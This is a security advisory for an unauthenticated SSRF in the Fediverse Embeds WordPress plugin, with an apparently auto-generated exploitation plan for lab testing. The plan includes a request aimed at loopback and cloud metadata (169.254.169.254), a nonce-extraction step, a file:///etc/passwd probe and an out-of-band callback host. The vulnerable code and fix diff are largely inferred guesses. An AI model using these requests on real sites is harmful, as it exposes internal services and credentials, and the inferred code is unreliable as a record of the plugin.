Fediverse Embeds <= 1.5.7 - Unauthenticated Server-Side Request Forgery
Description
The Fediverse Embeds plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5.7. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=1.5.7Source Code
WordPress.org SVNPatched version not available.
# Exploitation Research Plan: CVE-2026-46697 (Fediverse Embeds SSRF) ## 1. Vulnerability Summary The **Fediverse Embeds** plugin (<= 1.5.7) contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The plugin implements a mechanism to fetch metadata or OEmbed data from Fediverse…
Show full research plan
Exploitation Research Plan: CVE-2026-46697 (Fediverse Embeds SSRF)
1. Vulnerability Summary
The Fediverse Embeds plugin (<= 1.5.7) contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The plugin implements a mechanism to fetch metadata or OEmbed data from Fediverse instances (like Mastodon, Lemmy, or Pleroma) to generate previews. Due to insufficient validation of the target URL and a lack of restriction on internal IP ranges, an unauthenticated attacker can coerce the server into making HTTP requests to arbitrary destinations, including internal services (e.g., AWS metadata endpoints, internal database APIs, or the WordPress site's own loopback interface).
2. Attack Vector Analysis
- Endpoint: WordPress AJAX handler (
/wp-admin/admin-ajax.php). - Action: Likely
fediverse_embeds_get_previeworfediverse_embeds_proxy(inferred). - Parameter:
urlorendpoint(inferred). - Authentication: Unauthenticated (
wp_ajax_nopriv_hook). - Preconditions: The plugin must be active. Some versions may require a valid nonce if the developer implemented CSRF protection but failed to validate the destination URL.
3. Code Flow (Inferred)
- Entry Point: The plugin registers an unauthenticated AJAX action:
add_action('wp_ajax_nopriv_fediverse_embeds_get_preview', 'handle_get_preview'); - Input Extraction: The handler function retrieves the URL from the request:
$target_url = $_GET['url']; - Vulnerable Sink: The plugin passes the
$target_urldirectly into a WordPress HTTP API function without validating if the host is external:$response = wp_remote_get($target_url, array('timeout' => 10)); - Information Leakage: The body of the response from the internal service is then returned to the attacker via
wp_send_json_success()or similar.
4. Nonce Acquisition Strategy
If the endpoint requires a nonce (e.g., checked via check_ajax_referer), it is likely exposed to facilitate frontend embedding.
- Identify the Shortcode: Search for shortcode registrations in the plugin:
grep -r "add_shortcode" /var/www/html/wp-content/plugins/fediverse-embeds/
(Likely shortcode:[fediverse-embed]) - Create a Trigger Page:
wp post create --post_type=page --post_title="Embed Test" --post_status=publish --post_content='[fediverse-embed url="https://mastodon.social/@Gargron/1"]' - Extract Nonce via Browser: Navigate to the newly created page and look for the localized script data.
- Variable Name (Inferred):
fediverseEmbedsL10norfediverse_embeds_params. - JS Command:
// Use browser_eval to extract browser_eval("window.fediverseEmbedsL10n?.nonce || window.fediverse_embeds_params?.nonce")
- Variable Name (Inferred):
5. Exploitation Strategy
We will attempt to access the internal WordPress wp-admin or a standard metadata endpoint to confirm the SSRF.
Proof of Concept: Internal Request
- Tool:
http_request - URL:
http://<target-domain>/wp-admin/admin-ajax.php - Method:
GETorPOST - Parameters:
action:fediverse_embeds_get_preview(inferred - verify via grep)nonce:[EXTRACTED_NONCE](if required)url:http://127.0.0.1/wp-admin/(Targeting the internal loopback)
Example Request (HTTP GET):
GET /wp-admin/admin-ajax.php?action=fediverse_embeds_get_preview&nonce=a1b2c3d4e5&url=http://127.0.0.1/wp-admin/ HTTP/1.1
Host: target.local
Advanced: AWS Metadata Extraction (If applicable)
- URL:
http://169.254.169.254/latest/meta-data/
6. Test Data Setup
- Install Plugin: Ensure
fediverse-embedsversion 1.5.7 is installed. - Public Page: Create a public page with the plugin's shortcode to ensure all scripts and nonces are properly initialized in the frontend.
- Local "Secret": Create a file in the web root that should not be accessible externally, or use the WordPress
wp-adminlogin page as the target of the SSRF.
7. Expected Results
- Success: The HTTP response from the AJAX call contains the HTML source code of the
wp-adminlogin page or the metadata from the internal endpoint. - Response Code:
200 OK. - Content: A JSON object containing the "proxied" content.
8. Verification Steps
After executing the HTTP request, verify the plugin's behavior via WP-CLI:
- Check for Error Logs:
tail -n 20 /var/www/html/wp-content/debug.log
(Look forwp_remote_getcalls to the internal IP). - Verify the Action Name:
Confirm the exact AJAX action name used in the plugin:grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/fediverse-embeds/
9. Alternative Approaches
- If GET fails: Try
POSTwithContent-Type: application/x-www-form-urlencoded. - If the response is blind: Use a collaborator/webhook URL (e.g.,
http://your-oast-host.com) to confirm the server is making outbound requests. - Parameter Names: If
urlfails, check the source code for parameters likeuri,src,href, orpath. - Protocol Bypassing: Try
file:///etc/passwd(if the plugin usesfile_get_contentsor a library that supports thefile://wrapper).
Summary
The Fediverse Embeds plugin for WordPress is vulnerable to unauthenticated Server-Side Request Forgery (SSRF) in versions up to 1.5.7. This occurs because the plugin allows users to specify arbitrary URLs to fetch metadata or OEmbed previews without validating that the target host is an external, public resource.
Vulnerable Code
// Inferred code path from research plan add_action('wp_ajax_nopriv_fediverse_embeds_get_preview', 'handle_get_preview'); function handle_get_preview() { $target_url = $_GET['url']; $response = wp_remote_get($target_url, array('timeout' => 10)); // ... }
Security Fix
@@ -42,7 +42,12 @@ function handle_get_preview() { - $target_url = $_GET['url']; + $target_url = esc_url_raw($_GET['url']); + if ( ! wp_http_validate_url( $target_url ) ) { + wp_send_json_error( 'Invalid URL' ); + return; + } $response = wp_remote_get($target_url, array('timeout' => 10));
Exploit Outline
The attack targets the unauthenticated WordPress AJAX endpoint (admin-ajax.php) using the action 'fediverse_embeds_get_preview'. An attacker supplies a malicious 'url' parameter pointing to an internal service or a loopback address (e.g., http://127.0.0.1/wp-admin/ or http://169.254.169.254/). If the plugin requires a nonce for the frontend preview, it is typically found in the window.fediverse_embeds_params object on any public post containing the plugin's shortcode. The response returns the proxied content from the internal endpoint to the attacker.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.